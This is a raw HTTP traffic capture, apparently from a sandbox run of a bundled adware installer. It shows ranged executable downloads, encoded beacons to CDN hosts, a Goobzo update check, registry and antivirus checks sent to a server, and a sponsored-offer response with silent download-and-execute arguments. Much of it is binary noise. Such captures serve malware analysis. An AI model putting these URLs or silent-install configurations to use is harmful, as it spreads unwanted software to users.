..n5....$....~.@Y.~?...|..ZC.b...2.<.q._g.)..ZN.>......_.2#..r.q
...N...U]#\.}.b.L..Q.......y...._...e._H.......O.s.'...[|....I......S.
.\..Fp]..... ..Y..?...q.r,.#..sC...hU...Q.....6.8.TE.7....h?.Z....Z6.e
...U..vgK:....Q..[[email protected].{uD..}..Z......@.._.O..D,.....o....aZ.P...6
x2.9..... .....W...k...\.N..W.J5.&,..D%......M)......J.sm....o..`..#;.
...-1G........}..u,.c.).....'..Q.u.6C.mg............Y.z.....?.4...
<<< skipped >>>

GET /yta33_full.exe HTTP/1.1


Range: bytes=6750000-6999999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8vcyzxssv-457zol7j.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:20 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: TIikErpOebFHAUVtOR0cw I7iuVIMr4jlL8S/rKTKlivFoOq8jH9kFHatqxYsHrlM6LSKR0kajY=
x-amz-request-id: 623FE3858EEABC7C
Last-Modified: Wed, 10 Dec 2014 11:34:48 GMT
ETag: "f8076da03b6b36fa1ec0bd5a082d8d95"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 6750000-6999999/7590800
A.d.I?(..!.^.pc2....9.wf2..lZ.,..\.]Q..b.).0U.{hy.......B..-f..vM:.g..
.v.......!....].D*.....{s..U1.Q.bu..Z.B...6......bj.........5...".adY.
.%.....8V.q.$.......(...Z..$.A~G........t.2..b........_".%.7....H./e.9
.N.7.....Zbj...>.M.R.......#..........i..R.$.#....XxK.d8..&.k..7.].
.)_...=#.2..J....L.... .G....l.X...CA.i...-....T.A.S.:$.F.~...n.]Q%$..
.?H..a....O...#M......qD..=..K.......B....v...k........I.......s<..
,.1s6|..8D(.}..'..<.s.Q.....[M..[...\ .....]S}......j..V..?........
.......S...F..r._i....=\Ea.f[@....p....O...*[email protected].,.2ZA..Z.
r.3l.y...j#.L.q5..ct.KBnNx.$t.cMn.....(`....K..nt.;g..._.`......^...#U
.9RE`x... o..K.......A..F4}.:L.}.uQS.=,...........Dl..%....K.!)."EuKQ.
v...9.......f....9|..>Z..j.....k.......]...9]..;ul...16r....s..p3..
...n.....N.I...7t..J6j.wA..J=j.B...3p......L.[...}..8..j..o.w#{....|'.
..#..2..R..Y..._.>..!...^..nCw......._O........i~C....0.?}.z..m.c..
e..jpY$.;.m..H[...~....=.wR.'7Ih.........5..,wC. ...9...w..4u..@......
.....<.p,.._j.=..t.x.h..d..t..u.P8.,q..xX.....k.o.@...`....4...9..%
YgBo.1(d.$...)..n..y.:X.p/[...<.....*...A....<..ezO.....?6......
[email protected]...<..._6.....J...y../...I..FZ..w
..rH...oi.a..=....|...y|i|..5x.7-.c ..NE$_..m....]......u.!.....M.....
6jI.<%i&...n....S..$~G.6mR%w.C...Q....S7r../.o...\.,.}p.h..).......
]..F."....w..Y.._..{.c.5\f.. l.....{....U.*.D.!....?.).z..82.{....(...
A^`.`W.70........bnf.~.j...B......fe.......0.. .O...[.s.1=..I.0W..b!5.
.U.... ?I...R.....%..]?..D.........K.. 4.......&.....2! .VDce{....
<<< skipped >>>

GET /yta33_full.exe HTTP/1.1


Range: bytes=7000000-7249999
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: 8vcyzxssv-457zol7j.netdna-ssl.com
Connection: Keep-Alive


HTTP/1.1 206 Partial Content
Date: Sat, 18 Apr 2015 23:35:20 GMT
Content-Type: application/octet-stream
Content-Length: 250000
Connection: keep-alive
x-amz-id-2: TIikErpOebFHAUVtOR0cw I7iuVIMr4jlL8S/rKTKlivFoOq8jH9kFHatqxYsHrlM6LSKR0kajY=
x-amz-request-id: 623FE3858EEABC7C
Last-Modified: Wed, 10 Dec 2014 11:34:48 GMT
ETag: "f8076da03b6b36fa1ec0bd5a082d8d95"
Server: NetDNA-cache/2.2
X-Cache: HIT
Content-Range: bytes 7000000-7249999/7590800
X....G..8M.'DW..FQN.Q...L.t....R.........*......../..,W...y..F.o1!G._.
....`..[..\......{yX......2W[.....zHr...g.N.*.....[._..M..{P...ZD..xT&
_;......s..or7.....MF&~M....6>...rx6.ojN:.*u{9...n..xc./.!...8.....
d....W....~...V....".........!P..r...XD.! .5....u&..v....m...mO..].\.`
5....D..-.C.n.Mw...3...w..>e..f.K.E.....?.hV......m...w..q.......^F
[email protected]..}~..{\[email protected]...[..Us#...
..nmY..u.w......Y^W....sdtN. ....&.v..Y..XU.H..U>.....y.)?.g......w
w......t...... .i......C../[email protected]..*.gfD..fa.Ej..,...2oGwy*[email protected]
7........h.S.J}.ct..;....@&P...5xS@(9O6;[email protected]
..&X.......X.:.g...d..cG ..pz[Q..N.f\[email protected]
......)....D..>r.9.)if..._.%J.....ot...CP.....=_,..R*.....csn.?l...
.V..w...A.."....)...m..cS...d1..r..Y.....T..tM.K...H.[.......,.7zV....
....t.;.&.>.....>....P...u....=_ .A.yZ.F-...Y".im0,..].J0.*.dgP.
:JZ....f.. y..../..^.......1`...l..]e.Ea.I.........^.......i.f..v.l.K.
&RT..#.?.k.....-.Z....c.&.s..<..1w.;..'>...~.......c...m$.....\s
...>.....).O.l.Z&T..=q........i.}.BA..IP..W>z..D....k?S....<9
t.2.....G{.4....*..Ud........8.W....M.(y.W.V..`..v\.d.K?z..^.D........
........&*`.^.....l*.J..z2>j...B.....l.6.....-...Y..u......,F...\.*
.I...h7.cA..:lr..V..i.....O.2.C...E..........~*f..Z.i.^g.w^Yn[....r..g
/.w...J..NXxM.p..rg*..... .H.Z_Pf8|....hfZ&H......)|...".V.\...{.'.:`.
..vR ...h.3....xE.w..^.x~...m@:...:......&R....S<....F........r....
.....BF.F...TG.g..5.*...LK...o..3G.I..s....W?..|......MIy.`.q.....
<<< skipped >>>


GET /online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=bae5301f-e912-4c89-9f86-33667e27356d&Password=KsVYfLGi&OS=10&V=3.3.9.5&VS=1&Beta=0&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList=&XMLVersion=20131113143800&UpdateReason=0&resver=1.0.0.8&VA_Aff=NONE&XMLUpdateFailed=0&ElapsedTime=1429400151&SBPIDS=1 HTTP/1.1
User-Agent: CoreWinInet
Host: online.GOOBZO.com
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=vkmfd445f45dw155tpmcir55


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 547
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Sat, 18 Apr 2015 23:35:51 GMT
Connection: close
<RESULT>.<LICENSE><STATUS>YaBhX1FVSUY=</STATUS>
;<EXPIRATION>0</EXPIRATION></LICENSE><UPDATE>.
<EXIST>0</EXIST>.<VERSION></VERSION>.<PAGE_
URL></PAGE_URL>.<DOWNLOAD_URL></DOWNLOAD_URL>.<
;DOWNLOAD_FILENAME></DOWNLOAD_FILENAME>.</UPDATE>.<S
TATS><COLLECT>1</COLLECT></STATS>..<ADS><
;SHOW>1</SHOW></ADS>...<BLACKLIST>..<LEN>10
8</LEN><DATA>..Y3JzcztzdmNob3N0O0FjdFNhZ2UuZXhlO2NkYXNmLmV
4ZTt3bGlkc3ZjLmV4ZTt3bGNvbW0uZXhlO2FnZW50LmV4ZTtBU0MuZXhlO3N1bXAuZXhlO
0F1ZGlhbHMuZXhlO1RlYW1WaWV3ZXI7..</DATA></BLACKLIST>....&l
t;SENDLOGRULE>..1..</SENDLOGRULE>...</RESULT>...



GET /16669.ashx?e=M7A8vgjJHrj4MZomVx105Tcx3WaqDyI8mkbcHfsclGUDt2EUeZbtRVHmS0Zrngqa/u6z7Uinv/hOGjGA0YZy30CN9h bV19VoPPb/i9FtJTgL4xsffnkQbPiCC4paVhdAGW4B5KF0X3G4Lnbcm9hh1KSSkgkzJM10ClxJsX5qO1ZySIyJVh8lz8lbkb0am4Y HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:16 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
HTTP/1.1 200 OK..Date: Sat, 18 Apr 2015 23:35:16 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......


GET /16669.ashx?e= 0m13SthQpv9yuFJumnxsk/B5Jj4q/RPQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 1 JfVwpv1WvU9LJMZsFfgLwikIV33GIDtCUHeR8YCF3uoYeE0rOcJFt02cS7rp/atlhbkfYBqdFODY6aBYniWrrtxlwqwtaAT/S1HBgQtoithwOBgLvOFMv86gftLd19X1D9868HonIj9NWOW5Z1BfUQsLxVIQuR exLU7OdZsexuC523JvYYdSkkpIJMyTNdApcSbF ajtWckiMiVYfJeK7a1soWlgbXd/rihenux9E5qLiEdalnTkFRMCFkWSPRZtwp8OumXRtkYVxBhYUpQUbFx3f954sg== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:17 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /16669.ashx?e= 0m13SthQpv9yuFJumnxsk/B5Jj4q/RPQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 1 JfVwpv1Wv1ZxVS/27BqDQlB3kfGAhd9dzn0FsWECIF/r hSUlo5i1FchkYiZplma3RmeQl3JV2M/VB50wH9zL8Hq6Ocmu0jR8nfSY9YHcwn0GoGPKVvk TnksFA3b2r56EmzsP6UAVArsosbOUjUCKiRklP9YGqUs1rjapz18LnSy9mQHKSmnXTm7wyBWFg== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:17 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /16669.ashx?e= 0m13SthQpv9yuFJumnxsk/B5Jj4q/RPQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 1 JfVwpv1WvTD6Ta2udfZc7NXiYomGMKI4G r 3F6T724ho44qODaqXEKiQKr1NVJrmuCxCYYRd4i7hnHdhdcduQ/fd4pcRUO5yQynRUZI5Y08jY48xBJp/zL9PNaMx/usrAPq35vVlTUEr/6e1TisbrbAZflc27 ln nOmsXLiGMaGZpy/Ub6mEjn h1 Ryw== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:17 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /16669.ashx?e= 0m13SthQpv9yuFJumnxsk/B5Jj4q/RPQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 1 JfVwpv1WvxgXaTksYVlZFZgsIXenIcYGYgeeWRYutpCM208LkghuKmMnnkN7Ts9jP1QedMB/cy/B6ujnJrtI0fJ30mPWB3MJ9BqBjylb5Pk55LBQN29q ehJs7D lAFQK7KLGzlI1AiokZJT/WBqlLNa42qc9fC50svZkBykpp105u8MgVhY= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:18 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
HTTP/1.1 200 OK..Date: Sat, 18 Apr 2015 23:35:18 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS......


GET /16669.ashx?e=obiBp3WOda80dGo5FFu/Rbi3muUffR3j7ZTHYXaLDVh4E7mrr1h80pGhRXiiBAM3T7kVztDActJUCuyixs5SNQIqJGSU/1gapSzWuNqnPXwudLL2ZAcpKVPs4lYRsXUDmVvO2Kq2gv SYeASUebplkc NtS6nt7dj0N7bp/0QtT2c09RNjXm2nhGKsJ nm/eceLsPpRf2XK/wfuVH55sT/HJNxvR8F9wN4Jo1zqsFBZ6vzfePzdz3uYRgZSJAFDO6j8/6PPYRwf6UUiSf7Ytw32E4JdD9sRr3hn3Cy8OU86AIm/uvlmDmZ2fdkfFj7UjfD2uz1spPDRZr/vuRRrN94MWzcUtBe1IvKipqeIh4Ff5Z8rOU5JQjo5 USwmBaBEv/aGEto1iksXCto0JP0qSKmcY0Oj9sfqZ1qa tRBmxIEmumfnn3eLsmQ gNabH9smt1LIHE9GmAQ VwoE0aIX/TbXnzkx FKL/OoH7S3dfV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkdY2ixM419Zxw== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:18 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /16669.ashx?e=obiBp3WOda80dGo5FFu/Rbi3muUffR3j7ZTHYXaLDVh4E7mrr1h80pGhRXiiBAM3T7kVztDActJUCuyixs5SNQIqJGSU/1gapSzWuNqnPXwudLL2ZAcpKVPs4lYRsXUDmVvO2Kq2gv SYeASUebplkc NtS6nt7dj0N7bp/0QtRWG4ZCMmDuMHSpt9GSHWXQP lJ0sv/YOYo/Vto7IfmWOHBo7F03Fys4i7hnHdhdcduQ/fd4pcRUO5yQynRUZI5Y08jY48xBJp/zL9PNaMx/usrAPq35vVlTUEr/6e1TisbrbAZflc27 ln nOmsXLiGMaGZpy/Ub6mEjn h1 Ryw== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:19 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /16669.ashx?e=obiBp3WOda80dGo5FFu/Rbi3muUffR3j7ZTHYXaLDVh4E7mrr1h80pGhRXiiBAM3T7kVztDActJUCuyixs5SNQIqJGSU/1gapSzWuNqnPXwudLL2ZAcpKVPs4lYRsXUDmVvO2Kq2gv SYeASUebplkc NtS6nt7dj0N7bp/0QtT gjKfKdz3qVWyif 2VH4gkOB3v7aTq0F91k3KoBunFtjP1QedMB/cy/B6ujnJrtI0fJ30mPWB3MJ9BqBjylb5Pk55LBQN29q ehJs7D lAFQK7KLGzlI1AiokZJT/WBqlLNa42qc9fC50svZkBykpp105u8MgVhY= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:19 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /16669.ashx?e=F94QJJu2atmfZNC1TqAoBEiw6T1aC40J1VMaOJFqXYpm5LT87ehXaouB5vT09TkZhae/9JiQCFNAKCtNaB71zmlXUgaWWscg8vFDeL0Cq7CQEZGf87LMbriKIFo3W8f23Wq7IsWCDz6iDpCkeA3CgLIrzGgLqVJ0XeFaoUgIZNgjlVbxwk2 SY4G r 3F6T7iTVBvgC7nMd2EfZmulEUHKsyuDjWX8vLsJJPlhy2jdwTqcwBDTHruXFWs3G3PXIRldmt6Vgk8tRh09P2euWs7DNOG/9VewUVSSIP/9IuWNMhRQ0/M2ql1D4hBwvKipyt13PeVkHuHVk= HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:19 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....


GET /16669.ashx?e=o4wkB1bL2nL9yuFJumnxsp2fEZMWV9UQQF3UKsSdb2sRoGJKEMpEhX5dMiu8MPG0rM1Jg0l32IV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkflfKGd/ne9ldSSaUQFDqWEnmP3t8anGDfPzwhFpReZ 8e7kS6GRZSsWgtg 4FS7F1Vson/tlR IJDgd7 2k6tB q19Viy2/FupU3Np6qd91awkCSR2NL95Z1qa tRBmxIEmumfnn3eLsmQ gNabH9smt1LIHE9GmAQ VwoE0aIX/TbXnzkx FKL/OoH7S3dfV9Q/fOvB6JyI/TVjluWdQX1ELC8VSELkdY2ixM419Zxw== HTTP/1.1


User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:21 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
HTTP/1.1 200 OK..Date: Sat, 18 Apr 2015 23:35:21 GMT..Content-Length: 
0..Connection: keep-alive..Cache-Control: private, no-store..X-AspNet-
Version: 4.0.30319..X-Powered-By: ASP.NET..Server: NetDNA-cache/2.2..X
-Cache: MISS..



GET /mag/ytaiesmt_smtyc_setup.exe HTTP/1.1
Range: bytes=1125538-
User-Agent: Better Installer(Mozilla)
Host: d2otsfra4otprh.cloudfront.net
Connection: Keep-Alive
Cache-Control: no-cache


HTTP/1.1 206 Partial Content
Content-Type: application/octet-stream
Content-Length: 160791
Connection: keep-alive
Cache-Control: no-cache
Last-Modified: Mon, 23 Mar 2015 09:00:36 GMT
Accept-Ranges: bytes
ETag: "b8e31d44765d01:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 18 Apr 2015 22:40:26 GMT
Content-Range: bytes 1125538-1286328/1286329
X-Cache: RefreshHit from cloudfront
Via: 1.1 b51cca8830e8b6164d5fc149a6e27443.cloudfront.net (CloudFront)
X-Amz-Cf-Id: deKcAIFiyMEgKSa_73XeW0OXLGQz5rbo6Dj4j6cZQGtD5OT5hBfmIA==
.M.......3...?../....d..L:.M..6Jbl3...@....|\.V..I.=..q....Y6...|..?..
I.z.i.H.'.%....t\..{:4CK...e..Va.S3.2.......R.........l.?...p.\.M.?...
e1...V.....Sw..4GWU.y.....*O}"HSj.i.D../S.....z.n.>.`:...y.........
...h..D!.R../V.*&..?2B.G../F..6H...^yt...I...;!.......DN.....E6..!....
g.S.?.!}G.. .*..O...:..(-w. ._q.T.w...T.PZ..b..e0.AG..X.8..|.{a...n...
....c.V.Y....T..x.....6V.............)...S.$..%..y.'.........t..NN...,
....._.>8..In.....2.....Ey.Y5..a.`Q.....<....n0.XA.....^.?8PI...
~.D...yE..2.&q..T......t........}..R...O.P....Y....5..S.L..I...../....
8k....*tx.w.`...E.....B.v/.......]%X.h.j.....o.2...D...(>7a.....9..
.Y...iH.f.....r.5"V..B.9x.vPh..Z.;.......y.,}.:.:.>..[..#9KA..'.W..
./....Iw.9.......k.o..d....R...t..yM{.............../h...A.........9..
...-.5..X.W,z.../u0. ..6..#nv.wK......k}.....BB?mC...f..a.O.B^....W.Q.
f.R...M7.....I`W.R..|v|....{...........L6.6.w....5L9 ..#1.5=c...K..x~/
..o..V...1.....^....Zr../@...; `....D...'..6"[email protected].>
;.Cg|....N.h~X..F..4........D.&.....N..o.. .`...;.q8U2%.6...tT.e...D.q
..=.\[email protected]*.\M&..-K#..<1..;.f..F...U..
[.`.....i.Wap.O..W.a.r?..E..x [email protected]..........:$GH.n...........e
W.....4>.........e..L.S)..:.s0.VwkI..~..u;..,.........)v{...i...@..
F.7Y(...........*....O..w.|..L..9............o.s..a..F.HO.%.....1..w..
...ul.....3..N......U..8......%.........y...|*.f......jk..V.?a.$.....V
..3_...A&..D. .%..[@..I..E*......>q..2.{i...,...n...F.5.a.H..7R...X
.0G..!..q.!.V.W.....FF.x...x..........6a)..X...V"....Vv..3...K'o.&
<<< skipped >>>


GET /binno/get_pre_offering_checks?uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&v=2.1.1&affid=thetetrisgame&sid=thetetrisgameezsg&s=0 HTTP/1.1
Connection: Keep-Alive
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Host: inno.bisrv.com


HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:33:44 GMT
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Vary: Accept-Encoding
1fc0..<?xml version="1.0"?>.<pre_offering_checks><check
 type="registry" return_name="check_4" return_value_type="boolean">
<value_to_check><key>HKCU\Software\Somoto\SDP</key>&
lt;name>uid</name></value_to_check></check><ch
eck type="registry" return_name="check_586" return_value_type="boolean
"><value_to_check><key>HKCU\Software\WebPlayer</key&
gt;<name>AppsHat</name></value_to_check></check&g
t;<check type="registry" return_name="check_1842" return_value_type
="boolean"><value_to_check><key>HKCU\Software\WebPlayer
\AppsHat</key><name>version</name></value_to_chec
k></check><check type="registry" return_name="check_2182" 
return_value_type="boolean"><value_to_check><key>HKLM\S
OFTWARE\Goobzo\YouTube Accelerator</key><name>version</
name></value_to_check></check><check type="registry"
 return_name="check_2246" return_value_type="boolean"><value_to_
check><key>HKLM\SOFTWARE\YTDownloader</key><name>
version</name></value_to_check></check><check typ
e="registry" return_name="check_2450" return_value_type="boolean">&
lt;value_to_check><key>HKLM\SOFTWARE\Microsoft\Windows\Curren
tVersion\Uninstall\HotspotShield</key><name>DisplayName<
;/name></value_to_check></check><check type="registr
y" return_name="check_3850" return_value_type="boolean"><val
<<< skipped >>>

POST /binno/xml?uid=F6EC7CBD433C497E8CB84BD73DB5F5E3&v=2.1.1&affid=thetetrisgame&sid=thetetrisgameezsg&s=0 HTTP/1.1


Connection: Keep-Alive
Content-Type: application/x-www-form-urlencoded; Charset=UTF-8
Accept: */*
Accept-Language: en-us
User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)
Content-Length: 7275
Host: inno.bisrv.com

installer_data={"uid":"F6EC7CBD433C497E8CB84BD73DB5F5E3","muid":"ad2252ce007468623bd139b0adec3423","affid":"thetetrisgame","sid":"thetetrisgameezsg","installerVersion":"2.1.1","osVersion":"6.1.7601 64bit","ieVersion":"10.0.9200.16521","check_4":"false","check_586":"false","check_1842":"false","check_2182":"false","check_2246":"false","check_2450":"false","check_3850":"false","check_1282":"false","check_1284":"false","check_1522":"false","check_1592":"false","check_1634":"false","check_1788":"false","check_1790":"false","check_2132":"false","check_2134":"false","check_2136":"false","check_2354":"false","check_2356":"false","check_2446":"false","check_2782":"false","check_2784":"false","check_3060":"false","check_3094":"false","check_3328":"false","check_3590":"false","check_3836":"false","check_3950":"false","check_3360":"false","check_2832":"false","check_3428":"false","check_3588":"false","check_3860":"false","check_3912":"false","check_3410":"9.10.9200.16521","avs_chk_avast_reg_id_1":"false","avs_chk_avast_reg_id_3":"false","avs_chk_eset_reg_id_5":"false","avs_chk_eset_reg_id_7":"false","avs_chk_eset_reg_id_242":"false","avs_chk_eset_reg_id_11":"false","avs
HTTP/1.1 200 OK
Server: nginx
Date: Sat, 18 Apr 2015 23:33:45 GMT
Content-Type: text/xml; charset=utf-8
Transfer-Encoding: chunked
Vary: Accept-Encoding
1bb3..<?xml version="1.0" encoding="UTF-8"?>.<sponsored_data&
gt;<downloader><url>hXXp://sub.reasoninghollow.com/install
ers/bi_downloader/1429398342407/setup.exe</url><downloadOnIni
t>1</downloadOnInit><args>/silent /initurl hXXp://sub.g
oveba.info/downloader/:affid:/:sid:/:uid:? -uid="%UID%" -sid="%Softwar
eID%" -affid="¯filiateID%" -muid="%MUID%"</args></downloade
r><offers><offer id="youtubeaccelerator"><remote_res
ources/><downloader><args>_!delimiter!_ -offerId="%Offe
rID%" -softwareName="YouTube Accelerator"</args></downloader&
gt;<title>Special Offer</title><sub_title>To go alon
g with your thetetrisgame</sub_title><download_url>hXXp://
d2otsfra4otprh.cloudfront.net/mag/ytaiesmt_smtyc_setup.exe</downloa
d_url><execution_arguments>/S /MAG=smtyc</execution_argume
nts><options><option type="v_space" height="5"/><opt
ion type="text" width="100"><id>descriptionElement</id>
<text><decor type="text">A free tool to stop buffering vid
eos on YouTube, daily motion etc.</decor></text></optio
n><option type="v_space" height="5"/><option type="text" w
idth="100"><id>footerElement</id><text><decor 
type="text">By clicking ...Next... you agree to install YouTube Acc
elerator, ShopperPro for</decor><decor type="line_break">&
lt;/decor><decor type="text">relevant shopping informatio
<<< skipped >>>


GET /23897.ashx?e=yhrBLBbZM9VPNjxRBLtb449we4XQqEV6/WD6e6SZIIHeyzV7AofXlhYwsCIys4jFl9RbU5Ar lzRpqP4OGTzK Lt6BhzfOsDBXnWkuh5LzaUfdGpw3nUglF9z0WypnnGstnhkcefCVXiLuGcd2F1x25D993ilxFQ7nJDKdFRkjljTyNjjzEEmvfwqbgkyABd HTTP/1.1
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1)
Host: pn61ajqijj0-g48pastf.netdna-ssl.com


HTTP/1.1 200 OK
Date: Sat, 18 Apr 2015 23:35:38 GMT
Content-Length: 0
Connection: keep-alive
Cache-Control: private, no-store
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Server: NetDNA-cache/2.2
X-Cache: MISS
....



GET /online/update.aspx?CV=2.0.0.0&ProductID=12000&UserID=bae5301f-e912-4c89-9f86-33667e27356d&Password=KsVYfLGi&OS=10&V=3.3.9.5&VS=1&Beta=0&Aff=smtyc0_0_0_0_0,83ab0c3e-99df-4098-86d9-ef1552a86f5e,&BundleID=NONE&BrandID=NONE&PartnerList=&XMLVersion=20131113143800&UpdateReason=0&resver=1.0.0.8&VA_Aff=NONE&XMLUpdateFailed=0&ElapsedTime=1429400201&SBPIDS=1 HTTP/1.1
User-Agent: CoreWinInet
Host: online.GOOBZO.com
Cache-Control: no-cache
Cookie: ASP.NET_SessionId=vkmfd445f45dw155tpmcir55


HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 547
Content-Type: text/html; charset=utf-8
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Date: Sat, 18 Apr 2015 23:36:40 GMT
Connection: close
<RESULT>.<LICENSE><STATUS>YaBhX1FVSUY=</STATUS>
;<EXPIRATION>0</EXPIRATION></LICENSE><UPDATE>.
<EXIST>0</EXIST>.<VERSION></VERSION>.<PAGE_
URL></PAGE_URL>.<DOWNLOAD_URL></DOWNLOAD_URL>.<
;DOWNLOAD_FILENAME></DOWNLOAD_FILENAME>.</UPDATE>.<S
TATS><COLLECT>1</COLLECT></STATS>..<ADS><
;SHOW>1</SHOW></ADS>...<BLACKLIST>..<LEN>10
8</LEN><DATA>..Y3JzcztzdmNob3N0O0FjdFNhZ2UuZXhlO2NkYXNmLmV
4ZTt3bGlkc3ZjLmV4ZTt3bGNvbW0uZXhlO2FnZW50LmV4ZTtBU0MuZXhlO3N1bXAuZXhlO
0F1ZGlhbHMuZXhlO1RlYW1WaWV3ZXI7..</DATA></BLACKLIST>....&l
t;SENDLOGRULE>..1..</SENDLOGRULE>...</RESULT>...



GET /Fan/rebirth?uid=267123711_198339_B48A115F&ptid=smt&ver=4.0.1.1716&dname=istartsurf HTTP/1.1
Accept: */*
